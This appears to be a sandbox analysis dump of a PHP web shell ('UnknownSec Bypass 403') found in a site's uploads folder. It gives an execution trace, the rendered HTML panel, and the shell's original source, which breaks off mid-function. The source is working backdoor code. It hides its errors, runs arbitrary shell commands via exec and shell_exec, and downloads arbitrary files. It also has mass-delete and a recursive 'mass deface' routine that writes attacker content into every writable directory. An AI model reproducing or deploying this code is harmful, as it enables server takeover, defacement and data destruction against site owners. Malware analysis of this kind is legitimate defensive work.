3 21 0 0.002214 522920 is_writable 0 /var/www/html/uploads/bybaru.php7 38 1 '/var/www/html/uploads'
3 21 1 0.002233 522960
3 21 R TRUE
2 19 1 0.002247 522936
2 19 R '<font color=\'green\'>drwxrwxrwx</font>'
2 22 0 0.002265 522832 getcwd 0 /var/www/html/uploads/bybaru.php7 211 0
2 22 1 0.002278 522880
2 22 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bybaru.php7 211 $dir = '/var/www/html/uploads'
2 23 0 0.002303 522880 str_replace 0 /var/www/html/uploads/bybaru.php7 213 3 '\\' '/' '/var/www/html/uploads'
2 23 1 0.002318 522976
2 23 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bybaru.php7 213 $dir = '/var/www/html/uploads'
2 24 0 0.002342 522880 explode 0 /var/www/html/uploads/bybaru.php7 214 2 '/' '/var/www/html/uploads'
2 24 1 0.002356 523456
2 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bybaru.php7 214 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bybaru.php7 215 $i = 0
1 A /var/www/html/uploads/bybaru.php7 215 $i++
2 25 0 0.002420 523384 scandir 0 /var/www/html/uploads/bybaru.php7 629 1 '/var/www/html/uploads'
2 25 1 0.002454 524008
2 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bybaru.php7', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/bybaru.php7 629 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bybaru.php7', 4 => 'data', 5 => 'prepend.php']
2 26 0 0.002492 523976 getcwd 0 /var/www/html/uploads/bybaru.php7 630 0
2 26 1 0.002509 524024
2 26 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bybaru.php7 630 $pa = '/var/www/html/uploads'
2 27 0 0.002544 524024 filemtime 0 /var/www/html/uploads/bybaru.php7 644 1 '/var/www/html/uploads/.'
2 27 1 0.002566 524064
2 27 R 1676240088
2 28 0 0.002591 523976 date 0 /var/www/html/uploads/bybaru.php7 644 2 'Y-m-d' 1676240088
2 28 1 0.002665 526368
2 28 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 644 $dt = '2023-02-12'
2 29 0 0.002703 526344 is_dir 0 /var/www/html/uploads/bybaru.php7 645 1 '/var/www/html/uploads/.'
2 29 1 0.002722 526384
2 29 R TRUE
2 30 0 0.002741 526352 filemtime 0 /var/www/html/uploads/bybaru.php7 644 1 '/var/www/html/uploads/..'
2 30 1 0.002764 526400
2 30 R 1676240088
2 31 0 0.002782 526304 date 0 /var/www/html/uploads/bybaru.php7 644 2 'Y-m-d' 1676240088
2 31 1 0.002822 526632
2 31 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 644 $dt = '2023-02-12'
2 32 0 0.002857 526360 is_dir 0 /var/www/html/uploads/bybaru.php7 645 1 '/var/www/html/uploads/..'
2 32 1 0.002875 526400
2 32 R TRUE
2 33 0 0.002895 526360 filemtime 0 /var/www/html/uploads/bybaru.php7 644 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.002916 526400
2 33 R 1676240088
2 34 0 0.002934 526304 date 0 /var/www/html/uploads/bybaru.php7 644 2 'Y-m-d' 1676240088
2 34 1 0.002974 526632
2 34 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 644 $dt = '2023-02-12'
2 35 0 0.003007 526360 is_dir 0 /var/www/html/uploads/bybaru.php7 645 1 '/var/www/html/uploads/.htaccess'
2 35 1 0.003025 526400
2 35 R FALSE
2 36 0 0.003044 526368 filemtime 0 /var/www/html/uploads/bybaru.php7 644 1 '/var/www/html/uploads/bybaru.php7'
2 36 1 0.003074 526416
2 36 R 1676240088
2 37 0 0.003093 526312 date 0 /var/www/html/uploads/bybaru.php7 644 2 'Y-m-d' 1676240088
2 37 1 0.003132 526640
2 37 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 644 $dt = '2023-02-12'
2 38 0 0.003165 526376 is_dir 0 /var/www/html/uploads/bybaru.php7 645 1 '/var/www/html/uploads/bybaru.php7'
2 38 1 0.003184 526416
2 38 R FALSE
2 39 0 0.003203 526368 filemtime 0 /var/www/html/uploads/bybaru.php7 644 1 '/var/www/html/uploads/data'
2 39 1 0.003225 526400
2 39 R 1676240088
2 40 0 0.003244 526304 date 0 /var/www/html/uploads/bybaru.php7 644 2 'Y-m-d' 1676240088
2 40 1 0.003284 526632
2 40 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 644 $dt = '2023-02-12'
2 41 0 0.003319 526360 is_dir 0 /var/www/html/uploads/bybaru.php7 645 1 '/var/www/html/uploads/data'
2 41 1 0.003337 526400
2 41 R TRUE
2 42 0 0.003357 526360 is_writable 0 /var/www/html/uploads/bybaru.php7 652 1 '/var/www/html/uploads/data'
2 42 1 0.003380 526400
2 42 R TRUE
2 43 0 0.003400 526360 p 1 /var/www/html/uploads/bybaru.php7 654 1 '/var/www/html/uploads/data'
3 44 0 0.003418 526360 fileperms 0 /var/www/html/uploads/bybaru.php7 119 1 '/var/www/html/uploads/data'
3 44 1 0.003437 526400
3 44 R 16895
2 A /var/www/html/uploads/bybaru.php7 119 $p = 16895
2 A /var/www/html/uploads/bybaru.php7 129 $i = 'd'
2 A /var/www/html/uploads/bybaru.php7 137 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 138 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 141 $i .= 'x'
2 A /var/www/html/uploads/bybaru.php7 142 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 143 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 146 $i .= 'x'
2 A /var/www/html/uploads/bybaru.php7 147 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 148 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 151 $i .= 'x'
2 43 1 0.003604 526400
2 43 R 'drwxrwxrwx'
2 45 0 0.003625 526360 is_writable 0 /var/www/html/uploads/bybaru.php7 655 1 '/var/www/html/uploads/data'
2 45 1 0.003648 526400
2 45 R TRUE
2 46 0 0.003669 526368 filemtime 0 /var/www/html/uploads/bybaru.php7 644 1 '/var/www/html/uploads/prepend.php'
2 46 1 0.003692 526416
2 46 R 1676240088
2 47 0 0.003710 526312 date 0 /var/www/html/uploads/bybaru.php7 644 2 'Y-m-d' 1676240088
2 47 1 0.003751 526640
2 47 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 644 $dt = '2023-02-12'
2 48 0 0.003786 526376 is_dir 0 /var/www/html/uploads/bybaru.php7 645 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.003805 526416
2 48 R FALSE
2 49 0 0.003825 526360 filemtime 0 /var/www/html/uploads/bybaru.php7 676 1 '/var/www/html/uploads/.'
2 49 1 0.003846 526384
2 49 R 1676240088
2 50 0 0.003866 526296 date 0 /var/www/html/uploads/bybaru.php7 676 2 'Y-m-d' 1676240088
2 50 1 0.003906 526624
2 50 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 676 $ft = '2023-02-12'
2 51 0 0.003942 526600 is_file 0 /var/www/html/uploads/bybaru.php7 677 1 '/var/www/html/uploads/.'
2 51 1 0.003961 526640
2 51 R FALSE
2 52 0 0.003979 526608 filemtime 0 /var/www/html/uploads/bybaru.php7 676 1 '/var/www/html/uploads/..'
2 52 1 0.004000 526656
2 52 R 1676240088
2 53 0 0.004020 526560 date 0 /var/www/html/uploads/bybaru.php7 676 2 'Y-m-d' 1676240088
2 53 1 0.004060 526888
2 53 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 676 $ft = '2023-02-12'
2 54 0 0.004094 526616 is_file 0 /var/www/html/uploads/bybaru.php7 677 1 '/var/www/html/uploads/..'
2 54 1 0.004113 526656
2 54 R FALSE
2 55 0 0.004132 526616 filemtime 0 /var/www/html/uploads/bybaru.php7 676 1 '/var/www/html/uploads/.htaccess'
2 55 1 0.004153 526656
2 55 R 1676240088
2 56 0 0.004171 526560 date 0 /var/www/html/uploads/bybaru.php7 676 2 'Y-m-d' 1676240088
2 56 1 0.004211 526888
2 56 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 676 $ft = '2023-02-12'
2 57 0 0.004244 526616 is_file 0 /var/www/html/uploads/bybaru.php7 677 1 '/var/www/html/uploads/.htaccess'
2 57 1 0.004263 526656
2 57 R TRUE
2 58 0 0.004289 526616 filesize 0 /var/www/html/uploads/bybaru.php7 678 1 '/var/www/html/uploads/.htaccess'
2 58 1 0.004308 526656
2 58 R 64
1 A /var/www/html/uploads/bybaru.php7 678 $s = 0.0625
2 59 0 0.004342 526560 round 0 /var/www/html/uploads/bybaru.php7 679 2 0.0625 3
2 59 1 0.004361 526632
2 59 R 0.063
1 A /var/www/html/uploads/bybaru.php7 679 $s = 0.063
1 A /var/www/html/uploads/bybaru.php7 683 $s = '0.063 KB'
2 60 0 0.004423 526768 is_writable 0 /var/www/html/uploads/bybaru.php7 691 1 '/var/www/html/uploads/.htaccess'
2 60 1 0.004447 526808
2 60 R FALSE
2 61 0 0.004467 526768 is_readable 0 /var/www/html/uploads/bybaru.php7 692 1 '/var/www/html/uploads/.htaccess'
2 61 1 0.004487 526808
2 61 R TRUE
2 62 0 0.004507 526768 p 1 /var/www/html/uploads/bybaru.php7 693 1 '/var/www/html/uploads/.htaccess'
3 63 0 0.004525 526768 fileperms 0 /var/www/html/uploads/bybaru.php7 119 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.004544 526808
3 63 R 33188
2 A /var/www/html/uploads/bybaru.php7 119 $p = 33188
2 A /var/www/html/uploads/bybaru.php7 125 $i = '-'
2 A /var/www/html/uploads/bybaru.php7 137 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 138 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 141 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 142 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 143 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 146 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 147 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 148 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 151 $i .= '-'
2 62 1 0.004706 526808
2 62 R '-rw-r--r--'
2 64 0 0.004736 526768 is_writable 0 /var/www/html/uploads/bybaru.php7 694 1 '/var/www/html/uploads/.htaccess'
2 64 1 0.004763 526808
2 64 R FALSE
2 65 0 0.004787 526768 is_readable 0 /var/www/html/uploads/bybaru.php7 694 1 '/var/www/html/uploads/.htaccess'
2 65 1 0.004813 526808
2 65 R TRUE
2 66 0 0.004840 526776 filemtime 0 /var/www/html/uploads/bybaru.php7 676 1 '/var/www/html/uploads/bybaru.php7'
2 66 1 0.004866 526824
2 66 R 1676240088
2 67 0 0.004892 526720 date 0 /var/www/html/uploads/bybaru.php7 676 2 'Y-m-d' 1676240088
2 67 1 0.004933 527048
2 67 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 676 $ft = '2023-02-12'
2 68 0 0.004978 526784 is_file 0 /var/www/html/uploads/bybaru.php7 677 1 '/var/www/html/uploads/bybaru.php7'
2 68 1 0.005001 526824
2 68 R TRUE
2 69 0 0.005028 526784 filesize 0 /var/www/html/uploads/bybaru.php7 678 1 '/var/www/html/uploads/bybaru.php7'
2 69 1 0.005049 526824
2 69 R 22439
1 A /var/www/html/uploads/bybaru.php7 678 $s = 21.9130859375
2 70 0 0.005088 526680 round 0 /var/www/html/uploads/bybaru.php7 679 2 21.9130859375 3
2 70 1 0.005112 526752
2 70 R 21.913
1 A /var/www/html/uploads/bybaru.php7 679 $s = 21.913
1 A /var/www/html/uploads/bybaru.php7 683 $s = '21.913 KB'
2 71 0 0.005206 526784 is_writable 0 /var/www/html/uploads/bybaru.php7 691 1 '/var/www/html/uploads/bybaru.php7'
2 71 1 0.005238 526824
2 71 R FALSE
2 72 0 0.005263 526784 is_readable 0 /var/www/html/uploads/bybaru.php7 692 1 '/var/www/html/uploads/bybaru.php7'
2 72 1 0.005292 526824
2 72 R TRUE
2 73 0 0.005317 526784 p 1 /var/www/html/uploads/bybaru.php7 693 1 '/var/www/html/uploads/bybaru.php7'
3 74 0 0.005333 526784 fileperms 0 /var/www/html/uploads/bybaru.php7 119 1 '/var/www/html/uploads/bybaru.php7'
3 74 1 0.005351 526824
3 74 R 33204
2 A /var/www/html/uploads/bybaru.php7 119 $p = 33204
2 A /var/www/html/uploads/bybaru.php7 125 $i = '-'
2 A /var/www/html/uploads/bybaru.php7 137 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 138 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 141 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 142 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 143 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 146 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 147 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 148 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 151 $i .= '-'
2 73 1 0.005571 526824
2 73 R '-rw-rw-r--'
2 75 0 0.005600 526784 is_writable 0 /var/www/html/uploads/bybaru.php7 694 1 '/var/www/html/uploads/bybaru.php7'
2 75 1 0.005631 526824
2 75 R FALSE
2 76 0 0.005657 526784 is_readable 0 /var/www/html/uploads/bybaru.php7 694 1 '/var/www/html/uploads/bybaru.php7'
2 76 1 0.005686 526824
2 76 R TRUE
2 77 0 0.005713 526776 filemtime 0 /var/www/html/uploads/bybaru.php7 676 1 '/var/www/html/uploads/data'
2 77 1 0.005743 526808
2 77 R 1676240088
2 78 0 0.005769 526712 date 0 /var/www/html/uploads/bybaru.php7 676 2 'Y-m-d' 1676240088
2 78 1 0.005816 527040
2 78 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 676 $ft = '2023-02-12'
2 79 0 0.005864 526768 is_file 0 /var/www/html/uploads/bybaru.php7 677 1 '/var/www/html/uploads/data'
2 79 1 0.005886 526808
2 79 R FALSE
2 80 0 0.005912 526776 filemtime 0 /var/www/html/uploads/bybaru.php7 676 1 '/var/www/html/uploads/prepend.php'
2 80 1 0.005942 526824
2 80 R 1676240088
2 81 0 0.005969 526720 date 0 /var/www/html/uploads/bybaru.php7 676 2 'Y-m-d' 1676240088
2 81 1 0.006009 527048
2 81 R '2023-02-12'
1 A /var/www/html/uploads/bybaru.php7 676 $ft = '2023-02-12'
2 82 0 0.006056 526784 is_file 0 /var/www/html/uploads/bybaru.php7 677 1 '/var/www/html/uploads/prepend.php'
2 82 1 0.006079 526824
2 82 R TRUE
2 83 0 0.006103 526784 filesize 0 /var/www/html/uploads/bybaru.php7 678 1 '/var/www/html/uploads/prepend.php'
2 83 1 0.006125 526824
2 83 R 57
1 A /var/www/html/uploads/bybaru.php7 678 $s = 0.0556640625
2 84 0 0.006166 526680 round 0 /var/www/html/uploads/bybaru.php7 679 2 0.0556640625 3
2 84 1 0.006187 526752
2 84 R 0.056
1 A /var/www/html/uploads/bybaru.php7 679 $s = 0.056
1 A /var/www/html/uploads/bybaru.php7 683 $s = '0.056 KB'
2 85 0 0.006244 526784 is_writable 0 /var/www/html/uploads/bybaru.php7 691 1 '/var/www/html/uploads/prepend.php'
2 85 1 0.006270 526824
2 85 R FALSE
2 86 0 0.006290 526784 is_readable 0 /var/www/html/uploads/bybaru.php7 692 1 '/var/www/html/uploads/prepend.php'
2 86 1 0.006315 526824
2 86 R TRUE
2 87 0 0.006336 526784 p 1 /var/www/html/uploads/bybaru.php7 693 1 '/var/www/html/uploads/prepend.php'
3 88 0 0.006356 526784 fileperms 0 /var/www/html/uploads/bybaru.php7 119 1 '/var/www/html/uploads/prepend.php'
3 88 1 0.006377 526824
3 88 R 33261
2 A /var/www/html/uploads/bybaru.php7 119 $p = 33261
2 A /var/www/html/uploads/bybaru.php7 125 $i = '-'
2 A /var/www/html/uploads/bybaru.php7 137 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 138 $i .= 'w'
2 A /var/www/html/uploads/bybaru.php7 141 $i .= 'x'
2 A /var/www/html/uploads/bybaru.php7 142 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 143 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 146 $i .= 'x'
2 A /var/www/html/uploads/bybaru.php7 147 $i .= 'r'
2 A /var/www/html/uploads/bybaru.php7 148 $i .= '-'
2 A /var/www/html/uploads/bybaru.php7 151 $i .= 'x'
2 87 1 0.006553 526824
2 87 R '-rwxr-xr-x'
2 89 0 0.006574 526784 is_writable 0 /var/www/html/uploads/bybaru.php7 694 1 '/var/www/html/uploads/prepend.php'
2 89 1 0.006605 526824
2 89 R FALSE
2 90 0 0.006624 526784 is_readable 0 /var/www/html/uploads/bybaru.php7 694 1 '/var/www/html/uploads/prepend.php'
2 90 1 0.006646 526824
2 90 R TRUE
2 91 0 0.006666 526720 date 0 /var/www/html/uploads/bybaru.php7 721 1 'Y'
2 91 1 0.006705 527008
2 91 R '2023'
1 3 1 0.006727 526720
0.006780 362632
TRACE END [2023-02-12 20:15:14.065424]
Generated HTML code
<html><head></head><body class="bg-secondary text-light">/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
<meta name="author" content="UnknownSec">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>localhost - UnknownSec 403</title>
<meta name="viewport" content="width=device-width, initial-scale=0.70, user-scalable=no">
<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style.css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js"></script>
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<a class="text-decoration-none text-light" href="/bybaru.php7"><h4>UnknownSec Bypass <i class="bi bi-bug-fill"></i> 403</h4></a><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]
<div class="dropdown">
<button class="btn btn-outline-light dropdown-toggle btn-sm" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="bi bi-menu-down"></i> Menu</button>
<div class="dropdown-menu">
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=upload"><i class="bi bi-upload"></i> Upload</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=depes"><i class="bi bi-exclamation-diamond"></i> Mass depes</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=delete"><i class="bi bi-trash"></i> Mass delete</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=cmd"><i class="bi bi-terminal"></i> Terminal</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=info"><i class="bi bi-info-circle"></i> Info server</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=about"><i class="bi bi-info"></i> About</a>
</div>
</div><div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>2023-02-12</center></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/bybaru.php7&path=/var/www/html">bybaru.php7</a></td>
<td><center>2023-02-12</center></td>
<td><center>21.913 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="bybaru.php7">
<input type="hidden" name="path" value="/var/www/html/bybaru.php7">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
</tbody>
</table>
<div class="text-center">
<kbd>Copyright © 2023 - UnknownSec</kbd>
</div>
</div>
</div>
</div>
</div>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</body></html>Original PHP code
/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
<?php
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function dc($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ip() {
$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function ekse() {
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = ""; $output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && $return == 0) {
$methodArray[] = "exec";
}
//shell_exec()
$return = ""; $output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method) {
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file){
$p = fileperms($file);
if (($p & 0xC000) == 0xC000) {
$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ?
(($p & 0x0800) ? 's' : 'x' ) :
(($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ?
(($p & 0x0400) ? 's' : 'x' ) :
(($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ?
(($p & 0x0200) ? 't' : 'x' ) :
(($p & 0x0200) ? 'T' : '-'));
return $i;
exit();
}
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$▛'>
<meta name='robots' content='NOINDEX, NOFOLLOW'>
<title>".$_SERVER['HTTP_HOST']." - $▛ 403</title>
<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>
<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>
<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>
</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<a class='text-decoration-none text-light' href='".$_SERVER['PHP_SELF']."'><h4>$▛ Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a class="text-decoration-none" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".▟($path, p($path))." ]";
echo "
<div class='dropdown'>
<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>
<div class='dropdown-menu'>
<a class='dropdown-item' href='?path=$path&dir=$path&id=upload'><i class='bi bi-upload'></i> Upload</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=delete'><i class='bi bi-trash'></i> Mass delete</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=info'><i class='bi bi-info-circle'></i> Info server</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=about'><i class='bi bi-info'></i> About</a></h5>
</div>
</div>";
// tools nya
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
}
elseif($_GET['id'] == 'depes'){
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
